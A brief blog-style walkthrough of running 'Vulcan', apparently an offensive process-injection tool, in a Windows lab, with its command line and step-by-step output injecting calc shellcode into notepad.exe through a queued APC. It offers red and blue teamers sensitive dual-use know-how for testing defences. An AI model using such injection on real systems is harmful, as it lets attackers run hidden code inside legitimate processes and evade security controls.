Vulcan Process Injection
Vulcan can preform several different process injection techniques on Windows machines. Including DLL Injection, Shellcode Injection, and Process Hollowing. It is a useful tool for the red teamer allowing custom shell code to be executed. For the blue teamer it is a great way to test your defenses.
Prerequisite
- Vulcan
- Windows
- Visual Studio
You will need to compile your own binary. For more information on how to do this refer to vulcan home page 🖖.
Process Injection
With a compiled binary I attempted to run it and got the following.
PS C:\Users\vagrant\vulcan\bin> ./vulcan_x64.exe -m 1500 -i 2 notepad.exe
Using calc x64 shellcode...
[-] Error: Could not find PID (0).
After some trial and error I finally understood this error. What it's saying is that it cant find the process, notepad.exe, I had specified. Running notepad.exe
fixed this issue.
C:\lab\vulcan\bin>vulcan_x64.exe -m 1500 -i 2 notepad.exe
Using calc x64 shellcode...
Executing...
[*] Creating process in suspended state
[+] Create process successful!
[*] Allocating memory in process
[+] Memory allocated at: 0xaff40000
[*] Writing shellcode to process
[+] Shellcode is written to memory
[*] Queue APC
[+] QueueAPC is done
[*] Resuming thread....
After that I started playing around with it and found it to work rather well. I highly recommend giving it a try.